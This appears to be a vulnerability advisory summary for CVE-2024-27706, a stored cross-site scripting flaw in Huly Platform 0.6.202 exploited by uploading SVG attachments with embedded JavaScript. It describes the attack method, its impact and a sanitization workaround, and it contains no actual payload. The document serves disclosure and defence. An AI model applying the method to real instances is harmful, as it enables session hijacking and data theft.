CVE-2024-27706

Vulnerability

Overview

CVE-2024-27706 is a stored cross-site scripting (XSS) vulnerability in Huly Platform version 0.6.202. The flaw resides in the issue attachment functionality, where the application fails to sanitize or restrict SVG file uploads. An attacker can upload a malicious SVG file containing embedded JavaScript, which is then stored on the server and served to other users [1].

Exploitation

Method

To exploit this vulnerability, an attacker must have the ability to create or edit issues within the platform (some level of authenticated access may be required depending on the instance configuration). The attack involves uploading a crafted SVG file — containing a `` tag with arbitrary JavaScript — as an attachment to an issue. When another user opens or views the uploaded SVG file in their browser, the script executes within the context of the Huly application domain [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser. This can lead to session hijacking, theft of sensitive data, defacement of the application interface, or further actions performed on behalf of the victim within the Huly platform. Since the injected script is stored on the server, every user who views the malicious SVG is affected, making this a stored (persistent) XSS [1].

Mitigation

As of the publication date (April 3, 2024), no patch has been released for this specific version. The vendor has not addressed the issue. Administrators are advised to restrict SVG file uploads or implement content-type validation and SVG sanitization as a workaround. The vulnerability was discovered and reported by researcher Bruno Menna in February 2024 [1].